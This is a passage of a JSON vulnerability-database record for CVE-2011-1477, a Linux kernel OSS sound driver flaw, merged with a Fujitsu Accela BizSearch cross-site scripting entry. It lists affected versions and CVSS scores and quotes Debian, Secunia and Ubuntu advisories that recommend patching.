        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "kernel 2.6.35-rc4",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.33"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.6"
      },
      {
        "model": "kernel 2.6.33-rc8",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.17"
      },
      {
        "model": "linux enterprise desktop sp4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.12"
      },
      {
        "model": "linux enterprise real time sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "11"
      },
      {
        "model": "kernel 2.6.35-rc6",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.51"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.4"
      },
      {
        "model": "opensuse",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "11.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18.3"
      },
      {
        "model": "kernel 2.6.34-rc4",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "linux ia-32",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "linux mipsel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "linux mips",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "kernel 2.6.33-rc5",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.6"
      },
      {
        "model": "kernel rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.35.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.34.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.1"
      },
      {
        "model": "linux m68k",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "linux arm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.5"
      },
      {
        "model": "kernel 2.6.34-rc2-git1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.4"
      },
      {
        "model": "linux ia-64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "eaccela bizsearch",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fujitsu",
        "version": "2.1"
      },
      {
        "model": "eaccela bizsearch",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fujitsu",
        "version": "2.0"
      },
      {
        "model": "eaccela bizsearch",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fujitsu",
        "version": "1.0"
      },
      {
        "model": "accela bizsearch",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fujitsu",
        "version": "3.1"
      },
      {
        "model": "accela bizsearch",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fujitsu",
        "version": "3.0"
      },
      {
        "model": "eaccela bizsearch",
        "scope": "eq",
        "trust": 0.2,
        "vendor": "fujitsu",
        "version": "2.1/2.0/1.0*"
      }
    ],
    "sources": [
      {
        "db": "IVD",
        "id": "1edccd3a-1f91-11e6-abef-000c29c66e3d"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2011-2492"
      },
      {
        "db": "BID",
        "id": "47009"
      },
      {
        "db": "BID",
        "id": "48497"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-002807"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2012-002832"
      },
      {
        "db": "NVD",
        "id": "CVE-2011-1477"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201106-382"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "2.6.38.8",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:suse:linux_enterprise_desktop:10:sp4:*:*:lts:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2011-1477"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Dan Rosenberg",
    "sources": [
      {
        "db": "BID",
        "id": "47009"
      }
    ],
    "trust": 0.3
  },
  "cve": "CVE-2011-1477",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.2,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 3.9,
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Medium",
            "accessVector": "Network",
            "authentication": "None",
            "author": "IPA",
            "availabilityImpact": "None",
            "baseScore": 4.3,
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "JVNDB-2010-002807",
            "impactScore": null,
            "integrityImpact": "Partial",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Medium",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Local",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Partial",
            "baseScore": 4.6,
            "confidentialityImpact": "Partial",
            "exploitabilityScore": null,
            "id": "CVE-2011-1477",
            "impactScore": null,
            "integrityImpact": "Partial",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Medium",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          },
          {
            "accessComplexity": null,
            "accessVector": null,
            "authentication": null,
            "author": "IVD",
            "availabilityImpact": null,
            "baseScore": null,
            "confidentialityImpact": null,
            "exploitabilityScore": null,
            "id": "1edccd3a-1f91-11e6-abef-000c29c66e3d",
            "impactScore": null,
            "integrityImpact": null,
            "severity": null,
            "trust": 0.2,
            "vectorString": null,
            "version": "unknown"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2011-1477",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "IPA",
            "id": "JVNDB-2010-002807",
            "trust": 0.8,
            "value": "Medium"
          },
          {
            "author": "NVD",
            "id": "CVE-2011-1477",
            "trust": 0.8,
            "value": "Medium"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201106-382",
            "trust": 0.6,
            "value": "LOW"
          },
          {
            "author": "IVD",
            "id": "1edccd3a-1f91-11e6-abef-000c29c66e3d",
            "trust": 0.2,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "IVD",
        "id": "1edccd3a-1f91-11e6-abef-000c29c66e3d"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-002807"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2012-002832"
      },
      {
        "db": "NVD",
        "id": "CVE-2011-1477"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201106-382"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Multiple array index errors in sound/oss/opl3.c in the Linux kernel before 2.6.39 allow local users to cause a denial of service (heap memory corruption) or possibly gain privileges by leveraging write access to /dev/sequencer. The standard search page of Accela BizSearch contains a cross-site scripting vulnerability.By setting up a fraudulent website that exploits an XSS vulnerability of the Accela BizSearch\u0027s standard search page (the \"targeted website\") via the Internet, a remote attacker could execute arbitrary code on the computer of the visitors (the \"victims\") who have accessed the website. Fujitsu Accela BizSearch has an input validation vulnerability that allows attackers to perform cross-site scripting attacks. The attacker can construct a malicious WEB page, entice the user to parse, obtain sensitive information or hijack the user session. Linux kernel is prone to a local privilege-escalation vulnerability. \nLocal attackers can exploit this issue to execute arbitrary code with kernel-level privileges. Successful exploits will result in the complete compromise of affected computers. Failed exploit attempts will cause a denial-of-service condition. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. \nThe following products are affected:\neAccela BizSearch 1.0\neAccela BizSearch 2.0\neAccela BizSearch 2.1\nAccela BizSearch 3.0\nAccela BizSearch 3.1. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2264-1                   security@debian.org\nhttp://www.debian.org/security/                              dann frazier\nJune 18, 2011                          http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage        : linux-2.6\nVulnerability  : privilege escalation/denial of service/information leak\nProblem type   : local/remote\nDebian-specific: no\nCVE Id(s)      : CVE-2010-2524 CVE-2010-3875 CVE-2010-4075 CVE-2010-4655 \n                 CVE-2011-0695 CVE-2011-0710 CVE-2011-0711 CVE-2011-0726\n                 CVE-2011-1010 CVE-2011-1012 CVE-2011-1017 CVE-2011-1078 \n                 CVE-2011-1079 CVE-2011-1080 CVE-2011-1090 CVE-2011-1093 \n                 CVE-2011-1160 CVE-2011-1163 CVE-2011-1170 CVE-2011-1171\n                 CVE-2011-1172 CVE-2011-1173 CVE-2011-1180 CVE-2011-1182\n                 CVE-2011-1477 CVE-2011-1493 CVE-2011-1577 CVE-2011-1593\n                 CVE-2011-1598 CVE-2011-1745 CVE-2011-1746 CVE-2011-1748\n                 CVE-2011-1759 CVE-2011-1767 CVE-2011-1768 CVE-2011-1776\n                 CVE-2011-2022 CVE-2011-2182\nDebian Bug     : 618485\n\nSeveral vulnerabilities have been discovered in the Linux kernel that may lead\nto a privilege escalation, denial of service or information leak.  The Common\nVulnerabilities and Exposures project identifies the following problems:\n\nCVE-2010-2524\n\n    David Howells reported an issue in the Common Internet File System (CIFS). \n    Local users could cause arbitrary CIFS shares to be mounted by introducing\n    malicious redirects. \n\nCVE-2010-3875\n\n    Vasiliy Kulikov discovered an issue in the Linux implementation of the\n    Amateur Radio AX.25 Level 2 protocol. Local users may obtain access to\n    sensitive kernel memory. \n\nCVE-2010-4075\n\n    Dan Rosenberg reported an issue in the tty layer that may allow local\n    users to obtain access to sensitive kernel memory. \n   \nCVE-2011-0695\n\n    Jens Kuehnel reported an issue in the InfiniBand stack. Remote attackers can\n    exploit a race condition to cause a denial of service (kernel panic). \n\nCVE-2011-0710\n\n    Al Viro reported an issue in the /proc/\u003cpid\u003e/status interface on the\n    s390 architecture. Local users could gain access to sensitive memory\n    in processes they do not own via the task_show_regs entry. \n\nCVE-2011-0711\n\n    Dan Rosenberg reported an issue in the XFS filesystem. Local users may\n    obtain access to sensitive kernel memory. \n\nCVE-2011-0726\n\n    Kees Cook reported an issue in the /proc/pid/stat implementation. Local\n    users could learn the text location of a process, defeating protections\n    provided by address space layout randomization (ASLR). \n\nCVE-2011-1010\n\n    Timo Warns reported an issue in the Linux support for Mac partition tables. \n    \nCVE-2011-1012\n\n    Timo Warns reported an issue in the Linux support for Mac partition tables. \n    \nCVE-2011-1017\n \n    Timo Warns reported an issue in the Linux support for LDM partition tables. \n    Users with physical access can gain access to sensitive kernel memory or\n    gain elevated privileges by adding a storage device with a specially\n    crafted LDM partition. \n\nCVE-2011-1078\n\n    Vasiliy Kulikov discovered an issue in the Bluetooth subsystem. Local users\n    can obtain access to sensitive kernel memory. \n\nCVE-2011-1079\n\n    Vasiliy Kulikov discovered an issue in the Bluetooth subsystem. \n    \nCVE-2011-1080\n\n    Vasiliy Kulikov discovered an issue in the Netfilter subsystem. Local users\n    can obtain access to sensitive kernel memory. \n\nCVE-2011-1090\n\n    Neil Horman discovered a memory leak in the setacl() call on NFSv4\n    filesystems. Local users can exploit this to cause a denial of service\n    (Oops). \n\nCVE-2011-1093\n\n    Johan Hovold reported an issue in the Datagram Congestion Control Protocol\n    (DCCP) implementation. Remote users could cause a denial of service by\n    sending data after closing a socket. \n\nCVE-2011-1160\n\n    Peter Huewe reported an issue in the Linux kernel\u0027s support for TPM security\n    chips. \n\nCVE-2011-1163\n\n    Timo Warns reported an issue in the kernel support for Alpha OSF format disk\n    partitions. Users with physical access can gain access to sensitive kernel\n    memory by adding a storage device with a specially crafted OSF partition. \n\nCVE-2011-1170\n\n    Vasiliy Kulikov reported an issue in the Netfilter arp table\n    implementation. \n\nCVE-2011-1171\n\n    Vasiliy Kulikov reported an issue in the Netfilter IP table\n    implementation. \n    \nCVE-2011-1172\n\n    Vasiliy Kulikov reported an issue in the Netfilter IP6 table\n    implementation. \n    \nCVE-2011-1173\n\n    Vasiliy Kulikov reported an issue in the Acorn Econet protocol\n    implementation. Local users can obtain access to sensitive kernel memory on\n    systems that use this rare hardware. \n\nCVE-2011-1180\n\n    Dan Rosenberg reported a buffer overflow in the Information Access Service\n    of the IrDA protocol, used for Infrared devices. Remote attackers within IR\n    device range can cause a denial of service or possibly gain elevated\n    privileges. \n\nCVE-2011-1182\n\n    Julien Tinnes reported an issue in the rt_sigqueueinfo interface. Local\n    users can generate signals with falsified source pid and uid information. \n\nCVE-2011-1477\n\n    Dan Rosenberg reported issues in the Open Sound System driver for cards that\n    include a Yamaha FM synthesizer chip. This issue does not affect\n    official Debian Linux image packages as they no longer provide support for\n    OSS.  However, custom kernels built from Debians linux-source-2.6.32 may\n    have enabled this configuration and would therefore be vulnerable. \n\nCVE-2011-1493\n\n    Dan Rosenburg reported two issues in the Linux implementation of the\n    Amateur Radio X.25 PLP (Rose) protocol. A remote user can cause a denial of\n    service by providing specially crafted facilities fields. \n\nCVE-2011-1577\n\n    Timo Warns reported an issue in the Linux support for GPT partition tables. \n    Local users with physical access could cause a denial of service (Oops)\n    by adding a storage device with a malicious partition table header. \n\nCVE-2011-1593\n\n    Robert Swiecki reported a signednes issue in the next_pidmap() function,\n    which can be exploited my local users to cause a denial of service. \n\nCVE-2011-1598\n\n    Dave Jones reported an issue in the Broadcast Manager Controller Area\n    Network (CAN/BCM) protocol that may allow local users to cause a NULL\n    pointer dereference, resulting in a denial of service. \n\nCVE-2011-1745\n\n    Vasiliy Kulikov reported an issue in the Linux support for AGP devices. On default Debian\n    installations, this is exploitable only by users in the video group. \n\nCVE-2011-1746\n\n    Vasiliy Kulikov reported an issue in the Linux support for AGP devices. On default Debian installations, this is\n    exploitable only by users in the video group. \n\nCVE-2011-1748\n\n    Oliver Kartkopp reported an issue in the Controller Area Network (CAN) raw\n    socket implementation which permits ocal users to cause a NULL pointer\n    dereference, resulting in a denial of service. \n    \nCVE-2011-1759\n\n    Dan Rosenberg reported an issue in the support for executing \"old ABI\"\n    binaries on ARM processors. Local users can obtain elevated privileges due\n    to insufficient bounds checking in the semtimedop system call. \n\nCVE-2011-1767\n\n    Alexecy Dobriyan reported an issue in the GRE over IP implementation. \n    Remote users can cause a denial of service by sending a packet during\n    module initialization. \n\nCVE-2011-1768\n\n    Alexecy Dobriyan reported an issue in the IP tunnels implementation. \n    Remote users can cause a denial of service by sending a packet during\n    module initialization. \n\nCVE-2011-1776\n\n    Timo Warns reported an issue in the Linux implementation for GUID\n    partitions. Users with physical access can gain access to sensitive kernel\n    memory by adding a storage device with a specially crafted corrupted\n    invalid partition table. \n\nCVE-2011-2022\n\n    Vasiliy Kulikov reported an issue in the Linux support for AGP devices. On default Debian\n    installations, this is exploitable only by users in the video group. \n\nCVE-2011-2182\n\n    Ben Hutchings reported an issue with the fix for CVE-2011-1017 (see above)\n    that made it insufficient to resolve the issue. \n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 2.6.26-26lenny3. Updates for arm and hppa are not yet available,\nbut will be released as soon as possible. \n\nThe following matrix lists additional source packages that were rebuilt for\ncompatibility with or to take advantage of this update:\n\n                                             Debian 5.0 (lenny)\n     user-mode-linux                         2.6.26-1um-2+26lenny3\n\nWe recommend that you upgrade your linux-2.6 and user-mode-linux packages. \nThese updates will not become active until after your system is rebooted. \n\nNote: Debian carefully tracks all known security issues across every\nlinux kernel package in all releases under active security support. \nHowever, given the high frequency at which low-severity security\nissues are discovered in the kernel and the resource requirements of\ndoing an update, updates for lower priority issues will normally not\nbe released for all kernels at the same time. Rather, they will be\nreleased in a staggered or \"leap-frog\" fashion. \n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.11 (GNU/Linux)\n\niQIcBAEBAgAGBQJN/Uv8AAoJEBv4PF5U/IZAp7QQAJmbSplvSgno69C0IFRzRgGI\nFS3B6uq5zNcvucQ4O2u5Zj/rPRef/M2Lxj4Vx/9FQ+4SlV/Ryazu3iknLL2iyc8a\n3zZBbo6S/OvhK0Prfd88ItCxXviYJchY91qp7Pm5TOkE1rM43XLhDAi1T1W507tY\n2rgqUfWkmN0Xq4Ykh3uySsIH6VkLqC5Ay7n5jXapdf3wJkyl1pg/iu0ndTnHaRTC\nByQehIMbj4OOivOcy06lS89Aro+KkgPRaA0lp5enegxUZTs5S5AIo7h6v9U078xr\nbcUcfrOsiTpVuTRND1L7kQQhPjmIv+UlzFjYuGPbHQxfZRVnVIlB4Ny3jIyN1aBx\nDMqxGR+novsYIuXAZWlsF17UYQXW5CFe+7aeS06bdaWWemJGkV0Mkfb72fwa3uLz\nsXlLp6fju2N5RQW7WVfjx89X7SAjKmYwQnCMbo0mwdRfujBNgbkm2xCrDy+QIE23\n5BnAY18kXpqaRbXPJB0sy8V99Wnl1ZSRRzX0kOZVecrhKAoCUGPJS2X+bDEtIzhB\nOWzxcC7P94hega5JYzteSZcyBkGRUj4604NCzD38OdPqqWvR3oWtwDRAKIR7gZ/L\nPRoDZucqfYV+BhXy/ib55qTo/va5gjmnlUFMP2G/TVQk9XQ/q8TxxefmnQc+Qy3A\nP/Hlaop/HijmZLuNpJB4\n=dXCB\n-----END PGP SIGNATURE-----\n. ----------------------------------------------------------------------\n\n\nFrost \u0026 Sullivan 2011 Report: Secunia Vulnerability Research\n\\\"Frost \u0026 Sullivan believes that Secunia continues to be a major player in the vulnerability research market due to its diversity of products that provide best-in-class coverage, quality, and usability.\\\" This is just one of the key factors that influenced Frost \u0026 Sullivan to select Secunia over other companies. \nRead the report here:\nhttp://secunia.com/products/corporate/vim/fs_request_2011/\n\n\n----------------------------------------------------------------------\n\nTITLE:\nAccela / eAccela BizSearch Search Cross-Site Scripting Vulnerability\n\nSECUNIA ADVISORY ID:\nSA45105\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/45105/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=45105\n\nRELEASE DATE:\n2011-06-29\n\nDISCUSS ADVISORY:\nhttp://secunia.com/advisories/45105/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/45105/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=45105\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nA vulnerability has been reported in Accela / eAccela BizSearch,\nwhich can be exploited by malicious people to conduct cross-site\nscripting attacks. \n\nPlease see the vendor\u0027s advisory for the list of affected versions. \n\nSOLUTION:\nContact the vendor for patches. \n\nPROVIDED AND/OR DISCOVERED BY:\nReported by the vendor. \n\nORIGINAL ADVISORY:\nFujitsu (Japanese):\nhttp://software.fujitsu.com/jp/security/products-fujitsu/solution/bizsearch201103.html\n\nJVN (English):\nhttp://jvndb.jvn.jp/en/contents/2010/JVNDB-2010-002807.html\n\nOTHER REFERENCES:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n. \n\nSoftware Description:\n- linux-ti-omap4: Linux kernel for OMAP4\n\nDetails:\n\nAristide Fattori and Roberto Paleari reported a flaw in the Linux kernel\u0027s\nhandling of IPv4 icmp packets. \n(CVE-2010-4250)\n\nAn error was discovered in the kernel\u0027s handling of CUSE (Character device\nin Userspace). (CVE-2010-4650)\n\nA flaw was found in the kernel\u0027s Integrity Measurement Architecture (IMA). \nChanges made by an attacker might not be discovered by IMA, if SELinux was\ndisabled, and a new IMA rule was loaded. (CVE-2011-0006)\n\nA flaw was found in the Linux Ethernet bridge\u0027s handling of IGMP (Internet\nGroup Management Protocol) packets. (CVE-2011-1759)\n\nBen Hutchings reported a flaw in the kernel\u0027s handling of corrupt LDM\npartitions. (CVE-2011-2182)\n\nA flaw was discovered in the Linux kernel\u0027s AppArmor security interface\nwhen invalid information was written to it. (CVE-2011-3619)\n\nIt was discovered that some import kernel threads can be blocked by a user\nlevel process. (CVE-2012-0038)\n\nChen Haogang discovered an integer overflow that could result in memory\ncorruption. A local unprivileged user could use this to crash the system. \n(CVE-2012-0044)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 10.10:\n  linux-image-2.6.35-903-omap4    2.6.35-903.32\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \n\nReferences:\n  http://www.ubuntu.com/usn/usn-1394-1\n  CVE-2010-4250, CVE-2010-4650, CVE-2011-0006, CVE-2011-0716,\n  CVE-2011-1476, CVE-2011-1477, CVE-2011-1759, CVE-2011-1927,\n  CVE-2011-2182, CVE-2011-3619, CVE-2011-4621, CVE-2012-0038,\n  CVE-2012-0044\n\nPackage Information:\n  https://launchpad.net/ubuntu/+source/linux-ti-omap4/2.6.35-903.32\n. \n\nCVE-2011-1016\n\n    Marek Ol\u0161\u00e1k discovered an issue in the driver for ATI/AMD Radeon video\n    chips. \n\nThis update also includes changes queued for the next point release of\nDebian 6.0, which also fix various non-security issues. \nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\nHosted and sponsored by Secunia - http://secunia.com/. \n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. If\nyou use linux-restricted-modules, you have to update that package as\nwell to get modules which work with the new kernel version. Unless you\nmanually uninstalled the standard kernel metapackages (e.g. linux-generic,\nlinux-server, linux-powerpc), a standard system upgrade will automatically\nperform this as well",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2011-1477"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-002807"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2012-002832"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2011-2492"
      },
      {
        "db": "BID",
        "id": "47009"
      },
      {
        "db": "BID",
        "id": "48497"
      },
      {
        "db": "IVD",
        "id": "1edccd3a-1f91-11e6-abef-000c29c66e3d"
      },
      {
        "db": "PACKETSTORM",
        "id": "102430"
      },
      {
        "db": "PACKETSTORM",
        "id": "102644"
      },
      {
        "db": "PACKETSTORM",
        "id": "110534"
      },
      {
        "db": "PACKETSTORM",
        "id": "101680"
      },
      {
        "db": "PACKETSTORM",
        "id": "110495"
      }
    ],
    "trust": 4.05
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
